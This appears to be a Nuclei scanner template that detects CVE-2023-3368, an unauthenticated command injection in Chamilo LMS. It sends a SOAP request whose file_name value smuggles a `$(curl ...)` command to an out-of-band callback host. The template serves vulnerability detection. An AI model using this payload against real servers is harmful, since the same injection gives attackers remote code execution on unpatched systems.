Chamilo LMS <= v1.11.20 Unauthenticated Command Injection

id: CVE-2023-3368

info:
  name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: |
    Command injection in `/main/webservices/additional_webservices.php`
    in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
    remote code execution via improper neutralisation of special characters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3368
    - https://starlabs.sg/advisories/23/23-3368/
    - https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
    - https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
    - https://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3368
    cwe-id: CWE-78
    epss-score: 0.93283
    epss-percentile: 0.99063
    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: chamilo
    product: chamilo
    shodan-query:
      - http.component:"Chamilo"
      - http.component:"chamilo"
      - cpe:"cpe:2.3:a:chamilo:chamilo"
  tags: cve2023,cve,chamilo,unauth,cmd,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/main/webservices/additional_webservices.php"

    headers:
      Content-Type: application/xml

    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body>
          <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
              <item>
                <key xsi:type="xsd:string">file_data</key>
                <value xsi:type="xsd:string"></value>
              </item>
              <item>
                <key xsi:type="xsd:string">file_name</key>
                <value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
              </item>
              <item>
                <key xsi:type="xsd:string">service_ppt2lp_size</key>
                <value xsi:type="xsd:string">720x540</value>
              </item>
            </param0>
          </ns1:wsConvertPpt>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "wsConvertPptResponse"
        part: body

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a0047304502204203ba81fa59deac5f8f0d0493727281f224ec0c682985a92a6e5399f6744213022100a8aec5d2c5159a5d6ec7bda077faa90c224689b24475f9cd3d24b1e18eed12b1:922c64590222798bb761d5b6d8e72950